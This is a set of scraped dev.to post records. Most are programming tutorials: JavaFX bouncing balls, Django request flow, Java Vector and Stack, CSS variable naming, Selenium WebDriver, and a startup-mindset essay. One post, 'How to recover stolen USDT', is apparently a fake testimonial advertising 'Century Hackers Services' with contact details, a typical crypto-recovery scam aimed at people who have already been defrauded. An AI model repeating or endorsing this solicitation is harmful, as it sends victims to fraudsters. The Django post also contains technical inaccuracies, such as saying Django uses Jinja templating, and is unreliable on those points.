1,917,817 | Case Study: Bouncing Balls | This section presents a program that displays bouncing balls and enables the user to add and remove... | 0 | 2024-07-09T21:24:07 | https://dev.to/paulike/case-study-bouncing-balls-bh9 | java, programming, learning, beginners | This section presents a program that displays bouncing balls and enables the user to add and remove balls.
[Section](https://dev.to/paulike/case-study-bouncing-ball-39cj) presents a program that displays one bouncing ball. This section presents a program that displays multiple bouncing balls. You can use two buttons to suspend and resume the movement of the balls, a scroll bar to control the ball speed, and the + or - button add or remove a ball, as shown in Figure below.

The example in [Section](https://dev.to/paulike/case-study-bouncing-ball-39cj) only had to store one ball. How do you store the multiple balls in this example? The **Pane**’s **getChildren()** method returns an **ObservableList<Node>**, a subtype of **List<Node>**, for storing the nodes in the pane. Initially, the list is empty. When a new ball is created, add it to the end of the list. To remove a ball, simply remove the last one in the list.
Each ball has its state: the x-, y-coordinates, color, and direction to move. You can define a class named **Ball** that extends **javafx.scene.shape.Circle**. The x-, y-coordinates and the color are already defined in **Circle**. When a ball is created, it starts from the upper-left corner and moves downward to the right. A random color is assigned to a new ball.
The **MultiplBallPane** class is responsible for displaying the ball and the **MultipleBounceBall** class places the control components and implements the control. The relationship of these classes is shown in Figure below. The code below gives the program.

```
package application;
import javafx.animation.KeyFrame;
import javafx.animation.Timeline;
import javafx.application.Application;
import javafx.beans.property.DoubleProperty;
import javafx.geometry.Pos;
import javafx.scene.Node;
import javafx.stage.Stage;
import javafx.scene.Scene;
import javafx.scene.control.Button;
import javafx.scene.control.ScrollBar;
import javafx.scene.layout.BorderPane;
import javafx.scene.layout.HBox;
import javafx.scene.layout.Pane;
import javafx.scene.paint.Color;
import javafx.scene.shape.Circle;
import javafx.util.Duration;
public class MultipleBounceBall extends Application {
@Override // Override the start method in the Application class
public void start(Stage primaryStage) {
MultipleBallPane ballPane = new MultipleBallPane();
ballPane.setStyle("-fx-border-color: yellow");
Button btAdd = new Button("+");
Button btSubtract = new Button("-");
HBox hBox = new HBox(10);
hBox.getChildren().addAll(btAdd, btSubtract);
hBox.setAlignment(Pos.CENTER);
// Add or remove a ball
btAdd.setOnAction(e -> ballPane.add());
btSubtract.setOnAction(e -> ballPane.subtract());
// Pause and resume animation
ballPane.setOnMousePressed(e -> ballPane.pause());
ballPane.setOnMouseReleased(e -> ballPane.play());
// Use a scroll bar to control animation speed
ScrollBar sbSpeed = new ScrollBar();
sbSpeed.setMax(20);
sbSpeed.setValue(10);
ballPane.rateProperty().bind(sbSpeed.valueProperty());
BorderPane pane = new BorderPane();
pane.setCenter(ballPane);
pane.setTop(sbSpeed);
pane.setBottom(hBox);
// Create a scene and place the pane in the stage
Scene scene = new Scene(pane, 250, 150);
primaryStage.setTitle("MultipleBounceBall"); // Set the stage title
primaryStage.setScene(scene); // Place the scene in the stage
primaryStage.show(); // Display the stage
}
public static void main(String[] args) {
Application.launch(args);
}
private class MultipleBallPane extends Pane {
private Timeline animation;
public MultipleBallPane() {
// Create an animation for moving the ball
animation = new Timeline(new KeyFrame(Duration.millis(50), e -> moveBall()));
animation.setCycleCount(Timeline.INDEFINITE);
animation.play(); // Start animation
}
public void add() {
Color color = new Color(Math.random(), Math.random(), Math.random(), 0.5);
getChildren().add(new Ball(30, 30, 20, color));
}
public void subtract() {
if(getChildren().size() > 0) {
getChildren().remove(getChildren().size() - 1);
}
}
public void play() {
animation.play();
}
public void pause() {
animation.pause();
}
public void increaseSpeed() {
animation.setRate(animation.getRate() + 0.1);
}
public void decreaseSpeed() {
animation.setRate(animation.getRate() > 0 ? animation.getRate() - 0.1 : 0);
}
public DoubleProperty rateProperty() {
return animation.rateProperty();
}
protected void moveBall() {
for(Node node: this.getChildren()) {
Ball ball = (Ball)node;
// Check boundaries
if(ball.getCenterX() < ball.getRadius() || ball.getCenterX() > getWidth() - ball.getRadius()) {
ball.dx *= -1; // Change ball move direction
}
if(ball.getCenterY() < ball.getRadius() || ball.getCenterY() > getHeight() - ball.getRadius()) {
ball.dy *= -1; // Change ball move direction
}
// Adjust ball position
ball.setCenterX(ball.dx + ball.getCenterX());
ball.setCenterY(ball.dy + ball.getCenterY());
}
}
}
class Ball extends Circle {
private double dx = 1, dy = 1;
Ball(double x, double y, double radius, Color color) {
super(x, y, radius);
setFill(color); // Set ball color
}
}
}
```
The **add()** method creates a new ball with a random color and adds it to the pane (line 73). The pane stores all the balls in a list. The **subtract()** method removes the last ball in the list (line 78).
When the user clicks the + button, a new ball is added to the pane (line 32). When the user clicks the - button, the last ball in the array list is removed (line 33).
The **moveBall()** method in the **MultipleBallPane** class gets every ball in the pane’s list and adjusts the balls’ positions (lines 114–115). | paulike |
1,917,818 | Mastering Django: A Workflow Guide | Understanding the Django Framework: A Deep Dive into its Working Flow Django is a... | 0 | 2024-07-09T21:29:39 | https://dev.to/tejas_khanolkar_473f3ed1a/mastering-django-a-workflow-guide-mdm | chaiaurcode, python, django, webdev |
## Understanding the Django Framework: A Deep Dive into its Working Flow
Django is a full-stack framework created in Python. To understand Django, it’s essential first to grasp the concept of a framework. A framework is the structure or skeleton of your application. It provides a basic foundation upon which you build your application. When developing an app using a framework, you must adhere to its rules and conventions. These rules are strict to ensure your application runs smoothly in a production environment. Official documentation for each framework is available to guide you in creating applications that comply with these rules.
Django has its own flow structure, which you must follow to inject your code correctly. Deviating from this structure can lead to errors and issues. Let’s delve into the main topic and understand the working flow of the Django framework.

## Request Handling in Django
1. User Request: The process begins when a user sends a request to the server. In this context, the server is the Django server.
2. URL Resolver: The Django server catches the request and passes it to the URL resolver, a private file in Django that developers do not have access to. This file resolves the URL and forwards the request to the urls.py file, where the routes are mapped to views.
## Understanding Views and MVT Architecture
3. URL Mapping: In the urls.py file, the URL resolver checks which route is mapped to which view and sends the request to the corresponding view function in the views.py file.
4. Views: In Django, a view is a function that takes a request as an argument and returns a response to the client. To fully understand views, you need to understand the MVT architecture that Django follows. MVT stands for Model, View, Template. In this architecture, the view acts as a communicator between models and templates.
## Interaction with Models
5. Model Interaction: Based on the nature of the request, the view may interact with models. A model in Django represents a table in the database. While you could interact directly with the database, Django provides a way to interact with it through models, which offer an abstract layer. This abstraction allows you to change the database with a single setting without interrupting the rest of the code.
## Returning the Response
6. Template Rendering: After interacting with the model, control returns to the view, which then searches for the appropriate template to return to the client. Templates in Django are specific folders containing HTML files. These HTML files are called templates because their content is dynamic, changing with the help of the Jinja template engine. Jinja allows you to inject logic into your HTML files, making them dynamic.
7. Response: After rendering the template, the controller (in this case, the view) prepares the final response and sends it back to the user (client).
## Conclusion
This is the overall workflow of a Django application. From receiving a request to returning a response, Django’s structure ensures a streamlined process that adheres to its MVT architecture. By following this flow, developers can create robust and scalable web applications efficiently.
| tejas_khanolkar_473f3ed1a |
1,917,819 | Vector and Stack Classes | Vector is a subclass of AbstractList, and Stack is a subclass of Vector in the Java API. The Java... | 0 | 2024-07-09T21:33:03 | https://dev.to/paulike/vector-and-stack-classes-k4 | java, programming, learning, beginners | **Vector** is a subclass of **AbstractList**, and **Stack** is a subclass of **Vector** in the Java API. The Java Collections Framework was introduced in Java 2. Several data structures were supported earlier, among them the **Vector** and **Stack** classes. These classes were redesigned to fit into the Java Collections Framework, but all their old-style methods are retained for
compatibility.
**Vector** is the same as **ArrayList**, except that it contains synchronized methods for accessing and modifying the vector. Synchronized methods can prevent data corruption when a vector is accessed and modified by two or more threads concurrently. For the many applications that do not require synchronization, using **ArrayList** is more efficient than using **Vector**.
The **Vector** class extends the **AbstractList** class. It also has the methods contained in the original **Vector** class defined prior to Java 2, as shown in Figure below.

Most of the methods in the **Vector** class listed in the UML diagram in Figure above are similar to the methods in the **List** interface. These methods were introduced before the Java Collections Framework. For example, **addElement(Object element)** is the same as the **add(Object element)** method, except that the **addElement** method is synchronized. Use the **ArrayList** class if you don’t need synchronization. It works much faster than **Vector**.
The **elements()** method returns an **Enumeration**. The **Enumeration** interface was introduced prior to Java 2 and was superseded by the **Iterator** interface. **Vector** is widely used in Java legacy code because it was the Java resizable array implementation before Java 2.
In the Java Collections Framework, **Stack** is implemented as an extension of **Vector**, as illustrated in Figure below.

The **Stack** class was introduced prior to Java 2. The methods shown in Figure above were used before Java 2. The **empty()** method is the same as **isEmpty()**. The **peek()** method looks at the element at the top of the stack without removing it. The **pop()** method removes the top element from the stack and returns it. The **push(Object element)** method adds the specified element to the stack. The **search(Object element)** method checks whether the specified element is in the stack. | paulike |
1,917,820 | Nomeação de Variáveis CSS: Boas Práticas e Abordagens | Recentemente, enquanto navegava na internet, como todo bom desenvolvedor front-end, quis "roubar" a... | 0 | 2024-07-10T10:09:19 | https://dev.to/leomunizq/nomeacao-de-variaveis-css-boas-praticas-e-abordagens-48o3 | Recentemente, enquanto navegava na internet, como todo bom desenvolvedor front-end, quis "roubar" a paleta de cores de um site. Então, abri o inspetor de elementos para copiar os valores hexadecimais das cores e me deparei com uma surpresa inusitada: as variáveis CSS estavam nomeadas de forma inconsistente.
<br><br>
<figure style="width: 48%; margin-right: 2%;">
<img src="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y26m14p3n9phpztltqt1.png" alt="css inconsistency names" style="width: 48%; margin-right: 2%;"/>
<figcaption>juro, nao è meme.</figcaption>
</figure>
<br><br>
Como você pode perceber, os valores das variáveis não correspondiam aos seus nomes, o que é um exemplo clássico de "naming inconsistency" (inconsistência de nomenclatura). É crucial evitar isso em sua base de código.
Nomear variáveis CSS é essencial para a organização, legibilidade e manutenção do código em projetos front-end. Apesar de parecer trivial, muitas empresas ainda não adotam um padrão de nomenclatura.
Este artigo explora várias abordagens para a nomeação de variáveis CSS, destacando a importância de escolhas semânticas e práticas consistentes, se voce ainda não sabe como declarar variaveis, eu te aconselho primeiro ler <a target="_blank" rel="noopener noreferrer" href="https://developer.mozilla.org/pt-BR/docs/Web/CSS/Using_CSS_custom_properties">este artigo no MDN Web Docs</a>, e depois voltar pra cá pra gente falar sobre as varias abordagens possiveis.
<br><br>
## Índice
<ul>
<li>
<a href="#why-use-variables">Por que Usar Variáveis CSS?</a>
</li>
<li>
<a href="#benefits">Vantagens das Variáveis CSS</a>
</li>
<li>
<a href="#approaches">Abordagens para Nomear Variáveis CSS</a>
</li>
<li>
<a href="#colors">Nomeação Baseada em Cores</a>
</li>
<li>
<a href="#semantic">Nomeação Semântica</a>
</li>
<li>
<a href="#combination">Combinação de Nomes Semânticos e de Cores</a>
</li>
<li>
<a href="#context">Nomeação Contextual</a>
</li>
<li>
<a href="#scope">Nomeação Baseada em Escopo</a>
</li>
<li>
<a href="#components">Nomeação Baseada em Componentes</a>
</li>
<li>
<a href="#type-valor">Nomeação Baseada em Tipos de Valores</a>
</li>
<li>
<a href="#theme">Nomeação Baseada em Temas</a>
</li>
<li>
<a href="#tools">Ferramentas de Linting para Variáveis CSS</a>
</li>
<li>
<a href="#conclusion">Conclusão</a>
</li>
</ul>
<b><b>
### Por que Usar Variáveis CSS? <a id="why-use-variables" href="#why-use-variables">🔗</a>
Segundo CSS Tricks, variáveis CSS (custom properties) proporcionam flexibilidade e poder ao CSS, permitindo a criação de temas dinâmicos e o ajuste de estilos em tempo real. Jonathan Harrell destaca que variáveis CSS são nativas, dinâmicas e podem ser redefinidas dentro de media queries, além de funcionarem em qualquer contexto CSS, seja ele pré-processado ou não.
<br><br>
#### Vantagens das Variáveis CSS <a id="benefits" href="#benefits">🔗</a>
- **Reutilização:** Permitem o uso consistente de valores em todo o projeto.
- **Manutenção:** Facilita a atualização de estilos ao alterar valores em um único lugar.
- **Legibilidade:** Nomes significativos tornam o código mais fácil de entender e manter.
### Abordagens para Nomear Variáveis CSS <a id="approaches" href="#approaches">🔗</a>
**1. Nomeação Baseada em Cores** <a id="colors" href="#colors">🔗</a>
Nomear variáveis CSS com base nas cores é uma abordagem direta. Esta técnica é útil para pequenos projetos ou quando as cores têm um uso limitado, mas deve-se ter cuidado com possíveis problemas de manutenção, estou citando esta abordagem aqui, mas não recomendo usa-la.
```css
:root {
--blue: #4267b2;
--indigo: #3b2614;
--purple: #754218;
--pink: #f1ece7;
--red: #b50000;
--orange: #dc3545;
--yellow: #f2b300;
--green: #009733;
}
```
**Vantagens:**
**Clareza imediata:** Facilita a identificação da cor exata.
**Simplicidade:** Fácil de implementar.
**Desvantagens:**
**Semântica limitada:** Não indica o propósito da cor.
**Reutilização:** Pode ser confuso em projetos maiores com múltiplos contextos de uso.
**Manutenção:** Alterar uma cor pode quebrar a consistência semântica.
### 2. Nomeação Semântica <a id="semantic" href="#semantic">🔗</a>
Nomear variáveis com base no propósito ou contexto de uso melhora a compreensão do código.
```css
:root {
--primary-color: #4267b2;
--secondary-color: #3b2614;
--accent-color: #754218;
--background-color: #f1ece7;
--error-color: #b50000;
--warning-color: #dc3545;
--info-color: #f2b300;
--success-color: #009733;
}
```
**Vantagens:**
**Clareza semântica:** Indica o propósito ou contexto da cor.
**Facilidade de manutenção:** Simples de atualizar e reutilizar.
**Suporte a temas:** Fácil implementação de temas diferentes.
**Consistência:** Facilita a colaboração em equipes.
**Desvantagens:**
**Abstração:** Pode requerer mais esforço para mapear nomes a cores específicas.
**Curva de aprendizado:** Pode ser desafiador para novos desenvolvedores.
### 3. Combinação de Nomes Semânticos e de Cores <a id="combination" href="#combination">🔗</a>
Combina semântica com a descrição da cor, proporcionando clareza e contexto.
```css
:root {
--primary-blue: #4267b2;
--secondary-brown: #3b2614;
--accent-purple: #754218;
--background-pink: #f1ece7;
--error-red: #b50000;
--warning-orange: #dc3545;
--info-yellow: #f2b300;
--success-green: #009733;
}
```
**Vantagens:**
**Detalhamento:** Combina clareza imediata com contexto semântico.
**Contexto adicional:** Facilita a compreensão e manutenção.
**Desvantagens:**
**Verbosidade:** Pode resultar em nomes mais longos e verbosos.
### 4. Nomeação Contextual <a id="context" href="#context">🔗</a>
As variáveis são nomeadas de acordo com o contexto de uso.
```css
:root {
--header-background: #333;
--header-color: #fff;
--footer-background: #222;
--footer-color: #ccc;
}
.header {
background-color: var(--header-background);
color: var(--header-color);
}
.footer {
background-color: var(--footer-background);
color: var(--footer-color);
}
```
**Vantagens:**
**Clareza contextual:** Facilita a identificação do propósito das variáveis em partes específicas do layout.
**Evita conflitos:** Útil em grandes projetos com múltiplos componentes.
**Desvantagens:**
**Potencial de repetição:** Pode haver redundância de variáveis para diferentes contextos.
### 5. Nomeação Baseada em Escopo <a id="scope" href="#scope">🔗</a>
As variáveis são nomeadas para refletir o escopo específico onde serão usadas. Isso pode ajudar a evitar conflitos de nomenclatura em grandes projetos.
```css
:root {
--button-primary-bg: #007bff;
--button-primary-color: #fff;
--button-secondary-bg: #6c757d;
--button-secondary-color: #fff;
}
.button-primary {
background-color: var(--button-primary-bg);
color: var(--button-primary-color);
}
.button-secondary {
background-color: var(--button-secondary-bg);
color: var(--button-secondary-color);
}
```
**Vantagens:**
**Evita conflitos:** Reduz a chance de colisões de nomes em grandes bases de código.
**Escopo claro:** Facilita a manutenção e leitura do código.
**Desvantagens:**
**Complexidade:** Pode adicionar complexidade ao gerenciar muitos escopos diferentes.
### 6. Nomeação Baseada em Componentes (Component-based Naming) <a id="components" href="#components">🔗</a>
As variáveis são nomeadas de acordo com os componentes específicos da interface. Isso é comum em metodologias como BEM (Block Element Modifier).
```css
:root {
--card-background: #fff;
--card-border: 1px solid #ddd;
--card-title-color: #333;
}
.card {
background-color: var(--card-background);
border: var(--card-border);
}
.card-title {
color: var(--card-title-color);
}
```
**Vantagens:**
**Clareza de componente:** Facilita a identificação das variáveis relacionadas a componentes específicos.
**Modularidade:** Facilita a reutilização de estilos em diferentes partes do projeto.
**Desvantagens:**
**Manutenção:** Pode ser mais difícil manter consistência em projetos muito grandes.
### 7. Nomeação Baseada em Tipos de Valores (Type-based Naming) <a id="type-valor" href="#type-valor">🔗</a>
As variáveis são nomeadas para refletir o tipo de valor que representam. Isso é útil para manter consistência em todo o projeto.
```css
:root {
--color-primary: #3498db;
--color-secondary: #2ecc71;
--font-size-small: 12px;
--font-size-medium: 16px;
--font-size-large: 24px;
--spacing-small: 8px;
--spacing-medium: 16px;
--spacing-large: 32px;
}
.text-primary {
color: var(--color-primary);
}
.text-secondary {
color: var(--color-secondary);
}
.small-text {
font-size: var(--font-size-small);
}
.medium-text {
font-size: var(--font-size-medium);
}
.large-text {
font-size: var(--font-size-large);
}
.margin-small {
margin: var(--spacing-small);
}
.margin-medium {
margin: var(--spacing-medium);
}
.margin-large {
margin: var(--spacing-large);
}
```
**Vantagens:**
**Consistência:** Facilita a manutenção e leitura ao usar uma convenção clara para tipos de valores.
**Modularidade:** Facilita a reutilização de variáveis em diferentes contextos.
**Desvantagens:**
**Verbosidade:** Pode resultar em nomes longos.
### 8. Nomeação Baseada em Temas (Theming) <a id="theme" href="#theme">🔗</a>
As variáveis são nomeadas para refletir diferentes temas ou modos (como modo claro e modo escuro).
```css
:root {
--color-background-light: #ffffff;
--color-background-dark: #000000;
--color-text-light: #000000;
--color-text-dark: #ffffff;
}
.light-theme {
background-color: var(--color-background-light);
color: var(--color-text-light);
}
.dark-theme {
background-color: var(--color-background-dark);
color: var(--color-text-dark);
}
```
**Vantagens:**
**Flexibilidade:** Facilita a criação e manutenção de diferentes temas visuais.
**Consistência:** As variáveis podem ser facilmente trocadas para alterar o tema.
**Desvantagens:**
**Complexidade:** Gerenciar múltiplos temas pode adicionar complexidade ao projeto.
### Ferramentas de Linting para Variáveis CSS <a id="tools" href="#tools">🔗</a>
Ferramentas de linting podem ajudar a garantir que as variáveis sigam convenções de nomenclatura específicas, promovendo consistência no código. Exemplos de ferramentas incluem:
- <a href="https://stylelint.io/" target="_blank" rel="noopener noreferrer" >Stylelint</a>: Um linter moderno e flexível para CSS que pode ser configurado para verificar a consistência das variáveis.
<br>
- <a href="https://postcss.org/" target="_blank" rel="noopener noreferrer" >PostCSS</a>: Uma ferramenta que transforma o CSS com plugins, incluindo verificações de variáveis.
<br>
- <a href="https://github.com/CSSLint/csslint" target="_blank" rel="noopener noreferrer" >CSS
Linter</a>: Ferramenta específica para garantir o uso correto e consistente de variáveis CSS.
<br><br>
### Conclusão <a id="conclusion" href="#conclusion">🔗</a>
Essas abordagens e práticas podem ajudar a garantir que o uso de variáveis CSS em seus projetos seja eficiente, organizado e fácil de manter. A escolha da abordagem certa depende das necessidades e da escala do seu projeto, bem como das preferências e práticas da sua equipe de desenvolvimento.
### Créditos <a id="credits" href="#credits">🔗</a>
Este artigo foi inspirado por experiências pessoais e estudos em várias fontes de referência, incluindo CSS Tricks e trabalhos de <a target="_blank" rel="noopener noreferrer" href="https://www.jonathan-harrell.com/about/">Jonathan Harrell</a>. | leomunizq | |
1,917,821 | How to recover stolen USDT | Formerly I presumed I would never be able to retrieve the money I had lost to fraudsters. I made an... | 0 | 2024-07-09T21:39:22 | https://dev.to/kate_wille_2c1b4f093d4450/how-to-recover-stolen-usdt-pah | Formerly I presumed I would never be able to retrieve the money I had lost to fraudsters. I made an investment with a bitcoin investing website in the First quarter of 2024 just to discover that it was a scam. I got in touch with a few hackers in an effort to get my money back, but they all turned out to be swindlers who took my hard-earned cash. I was in a predicament, distraught, and certain that I had descended to my lowest point. All that changed when I came across a review of Century Hackers Services online. An alternative could not cut to the quick because I was eager to recover all of the money I had spent on that website, that was the end of my troubles. I made the decision to try my luck once more, to which I got in touch with Century Hackers Recovery Services and everything changed. The firm stepped in and quickly aided in the recovery of all of my money. I can attest to their high level of commitment and that they got the best recovery staff. You can also contact the firm by using:
E-mail : century@cyberservices.com
whatsApp : +31 (622) 673-038
| kate_wille_2c1b4f093d4450 | |
1,917,823 | Explication de SeleniumWebDriver : Automatisez votre Flux de Tests Web | Salut à tous, Aujourd'hui, je vais vous parler de Selenium WebDriver, une nouvelle notion que je... | 0 | 2024-07-10T15:53:18 | https://dev.to/laroseikitama/explication-de-seleniumwebdriver-automatisez-votre-flux-de-tests-web-e88 | webdev, selenium, testing, learning | Salut à tous,
Aujourd'hui, je vais vous parler de Selenium WebDriver, une nouvelle notion que je viens d'apprendre. Dans cet article, nous nous concentrerons principalement sur la théorie afin de comprendre ce qu'est Selenium WebDriver, son utilité et bien d'autres concepts associés.
## Table des matières
- [Qu'est ce que Selenium?](#qu-est-ce-que-selenium-?)
- [Composants de Selenium](#composants-de-selenium)
- [Selenium IDE](#selenium-ide)
- [Selenium RC](#selenium-rc)
- [Selenium WebDriver](#selenium-webdriver)
- [Selenium Grid](#selenium-grid)
- [Avantages et limites de Selenium WebDriver](#avantages-et-limites-de-selenium-webdriver)
- [Architecture du Framework Selenium WebDriver](#architecture-du-framework-selenium-webdriver)
- [Processus d'exécution d'un test](#processus-d-exécution-d-un-test)
- [Comment utiliser Selenium WebDriver avec Java ?](#comment-utiliser-selenium-webdriver-avec-java-?)
## Qu'est ce que Selenium ?
Selenium est un ensemble open-source d'outils et de bibliothèques qui permet d'effectuer des tests multi-navigateurs pour vérifier si le site web fonctionne de manière cohérente sur différents navigateurs Il est largement utilisé pour les tests automatisés des applications Web.
**Compatibilité :**
Selenium est compatible avec les langages C#, Java, Python, JavaScript, Ruby, Python et PHP.
**Remarque :**
- Les testeurs sont libres de choisir le langage dans lequel concevoir les cas de test, ce qui rend Selenium très avantageux.
- Il n'est pas obligatoire d'écrire le code Selenium dans le même langage que l'application. Par exemple, pour une application écrite en PHP, le script du test peut être écrit en Java.
## Composants de Selenium
La suite des tests Selenium comprend quatre composants principaux:

## Selenium IDE:
Selenium IDE pour `Integrated Development Environement`, est un outil d'enregistrement/d'exécution pour les tests fonctionnels (`functionnal testing`)
**NB :** Vous n'avez pas besoin d'apprendre un langage de script pour créer le test fonctionnel.
## Selenium RC:
Selenium RC, pour `Remote Controller` nécessite des connaissances dans au moins un langage de programmation. Ses bibliothèques principaux sont :
- Serveur
- Client
**NB :** Architecture complexe et ayant des limites.
## Selenium WebDriver
C'est un Framework permettant d'exécuter des tests multi-navigateurs et c'est une version améliorée du Selenium RC.
**NB :**
- Bien qu'il soit une version améliorée de Selenium RC, son architecture est complément différente.
- Il faut tout même connaitre un langage de programmation pour l'utiliser.
## Selenium Grid
Pour l'exécution simultanée de cas de test sur différents navigateurs, machines et système d'exploitation.
**NB :**
- Facilite les tests de compatibilités entre navigateurs.
- Deux versions : Grid 1 (ancienne version) et Grid 2 ( nouvelle version).
#Avantages et limites de Selenium WebDriver
## Avantages de Selenium WebDriver
1. Support Multinavigateur :
Selenium WebDriver supporte de nombreux navigateurs tels que Chrome, Firefox, Safari, Edge, etc. Cela permet de tester les applications web sur différents environnements de navigation.
2. Contrôle Direct du Navigateur :
WebDriver interagit directement avec le navigateur, ce qui assure une meilleure précision et fiabilité des tests par rapport à d'autres outils qui utilisent des scripts injectés.
3. Support Multi-langage :
Selenium WebDriver permet d'écrire des scripts de test dans plusieurs langages de programmation tels que Java, Python, C#, Ruby, JavaScript, etc., offrant une grande flexibilité aux développeurs.
4. API Flexible et Puissante :
L'API de Selenium WebDriver est riche et permet de réaliser des tests complexes incluant des interactions avancées avec les éléments web, la gestion des cookies, des sessions, etc.
5. Open Source et Gratuit :
Selenium est un outil open source, ce qui signifie qu'il est gratuit et que la communauté contribue constamment à son amélioration et à son évolution.
6. Compatibilité avec Divers Outils de Test :
Selenium WebDriver peut être intégré avec des frameworks de tests populaires comme TestNG, JUnit, NUnit, ainsi qu'avec des outils de CI/CD comme Jenkins, Maven, etc.
7. Tests Répartis et Parallèles :
Avec Selenium Grid, il est possible d'exécuter des tests en parallèle sur plusieurs machines et navigateurs, ce qui réduit le temps total d'exécution des tests.
8. Offre une compatibilité avec IphoneDriver, HtmlUnitDriver et AndroidDriver

## Limites de Selenium WebDriver
1. Limitation aux Tests Web :
Selenium WebDriver ne peut être utilisé que pour tester des applications web. Il ne supporte pas les applications desktop ou les applications mobiles natives.
2. Gestion des Pop-ups et des Fenêtres :
Selenium peut rencontrer des difficultés à gérer certaines pop-ups et fenêtres modales, surtout celles générées par le système d'exploitation.
3. Dépendance aux Sélecteurs de Page :
Les scripts de Selenium dépendent fortement de la structure et des sélecteurs des pages web (ID, nom, classes, etc.). Si l'interface utilisateur change fréquemment, les scripts de test doivent être constamment mis à jour.
4. Absence de Support pour Capturer les Erreurs Visuelles :
Selenium WebDriver ne peut pas détecter les erreurs visuelles telles que les problèmes d'alignement ou les couleurs incorrectes. Des outils supplémentaires comme Applitools Eyes peuvent être nécessaires pour les tests visuels.
5. Courbe d'Apprentissage :
Bien que Selenium soit puissant, il peut être complexe à maîtriser pour les débutants en raison de la nécessité de comprendre la programmation, l'automatisation des tests et l'API de Selenium.
6. Performance :
Les tests Selenium peuvent être plus lents que ceux exécutés par certains outils d'automatisation headless (sans interface utilisateur), surtout lorsque des captures d'écran ou des vidéos des tests sont nécessaires.
7. Maintenance des Tests :
En raison de la nature dynamique des applications web modernes, les tests Selenium nécessitent une maintenance régulière pour s'assurer qu'ils restent fonctionnels face aux changements de l'application.
## Architecture du Framework Selenium WebDriver
L'architecture Webdriver est composée de quatre composants principaux :
1. Client Librairies (Bibliothèques Clients)
Les bibliothèques clientes sont des API fournies par Selenium pour différents langages de programmation. Les principales bibliothèques clientes sont disponibles pour :
- Java
- C#
- Python
- Ruby
- JavaScript (Node.js)
2. JSON Wire Protocol over HTTP (Protocole JSON Wire)
Le JSON Wire Protocol est un protocole standardisé utilisé par Selenium WebDriver pour envoyer des commandes aux navigateurs. Ce protocole définit une API RESTful qui permet de communiquer avec les navigateurs en utilisant des requêtes HTTP. Les bibliothèques clientes envoient des requêtes HTTP contenant les commandes Selenium aux serveurs WebDriver via ce protocole.
3. Browser Drivers (Drivers de Navigateur)
Chaque navigateur a son propre driver qui agit comme un pont entre Selenium WebDriver et le navigateur. Les drivers de navigateur reçoivent les commandes en JSON Wire Protocol des bibliothèques clientes et les traduisent en actions spécifiques au navigateur.
Les drivers de navigateur comprennent :
- **ChromeDriver** pour Google Chrome
- **GeckoDriver** pour Mozilla Firefox
- **IEDriver**pour Internet Explorer
- **EdgeDriver** pour Microsoft Edge
- **SafariDriver** pour Safari
4. Browsers (Navigateurs)
Les navigateurs sont les applications web réelles avec lesquelles Selenium interagit. Les drivers de navigateur lancent et contrôlent les instances des navigateurs pour exécuter les scripts de test. Les navigateurs peuvent être exécutés en mode graphique ou headless (sans interface utilisateur) pour des tests plus rapides.

## Processus d'exécution d'un test
1. Écriture du Script : Le testeur écrit des scripts de test en utilisant les bibliothèques clientes de Selenium dans le langage de programmation choisi.
2. Envoi de Commandes : Les bibliothèques clientes envoient des commandes en utilisant le JSON Wire Protocol via des requêtes HTTP au driver de navigateur correspondant.
3. Interprétation des Commandes : Le driver de navigateur interprète les commandes et les traduit en actions spécifiques au navigateur.
4. Exécution des Actions : Le navigateur exécute les actions (comme cliquer sur un bouton, entrer du texte, etc.) et retourne les résultats via le driver de navigateur.
5. Retour des Résultats : Les résultats des actions sont renvoyés via le driver de navigateur aux bibliothèques clientes, qui les traitent et génèrent des rapports de test.
## Comment utiliser Selenium WebDriver avec Java?
Pour cette section de pratique, je vous invite a lire cette article [Introduction pratique aux tests d'applications Web avec Selenium WebDriver et Java.](https://dev.to/laroseikitama/introduction-pratique-aux-tests-dapplications-web-avec-selenium-webdriver-et-java-23ml) | laroseikitama |
1,917,824 | How Founding a Startup is Curing my Perfectionism (1/3) | From childhood, many of us learn to tie our self-worth to our performance. When achievements aren't... | 0 | 2024-07-09T21:45:30 | https://dev.to/ladam0203/how-launching-my-startup-is-curing-my-perfectionism-13-44d7 | startup, mentalhealth, productivity | From childhood, many of us learn to tie our self-worth to our performance. When achievements aren't acknowledged or appreciated appropriately, this mindset can affect our hobbies, projects, career paths, and even relationships throughout life. Launching a startup, (alongside proper therapy,) has been, - I dare to say - vital in healing my perfectionism and fear of failure (and success). Here’s how:
## 1. Launching an MVP - If it's 'perfect,' you're doing it wrong
One of the first challenges in launching a company is creating a Minimum Viable Product (MVP) that's so limited in functionality you might feel embarrassed to show it to anyone. The MVP should be the simplest solution that still addresses the customer's problem, and it needs to be released quickly.
For a perfectionist, this concept can be liberating: "So, the less I polish every detail, the better I am?" It's a counterintuitive notion that can be quite freeing. Here, the pressure of perfect performance is not just relieved but inverted: the more basic and minimal the solution, the better.
## 2. No one knows the best course of action. Only you.
Despite the abundance of advice available, no one can tell you the perfect path for your startup. This forces the perfectionist to realize that only they know what’s best for their business. They must trust their choices, make decisions independently, and be prepared to evaluate, correct, or even abandon those decisions as necessary. This process builds confidence and self-trust, essential for growth.
Making a choice and trusting it is crucial because indecision is the worst option.
## Conclusion
Starting a company puts you in a unique position where no one else knows the best path forward—only you do. This realization, combined with a healthy, ambitious belief in your vision, means you must make decisions and embrace the inevitability of failure.
Ironically, a perfectionist's quest for the perfect business involves navigating the most imperfect path possible. This journey helps heal those childhood wounds, as you learn to appreciate your achievements and thrive on failure.
The startup journey transforms the perfectionist mindset by redefining success and failure, ultimately fostering a healthier, more resilient approach to personal and professional growth.
| ladam0203 |
1,917,825 | Enhancing Your React Native App with Reanimated 3 Using Expo | Animations can significantly enhance the user experience of any mobile application. They make... | 0 | 2024-07-09T21:45:45 | https://devtoys.io/2024/07/08/enhancing-your-react-native-app-with-reanimated-3-using-expo/ | reactnative, animation, mobile, devtoys | ---
canonical_url: https://devtoys.io/2024/07/08/enhancing-your-react-native-app-with-reanimated-3-using-expo/
---
Animations can significantly enhance the user experience of any mobile application. They make interactions feel more intuitive, provide feedback, and create a polished, professional look. However, achieving smooth, high-performance animations in React Native can be challenging due to the JavaScript thread’s limitations. This is where Reanimated 3 comes in. This powerful library allows developers to create complex, performant animations with ease. In this blog post, we’ll explore how to use Reanimated 3 to build high-performance animations in your React Native app using Expo.
---
## Why Reanimated 3?
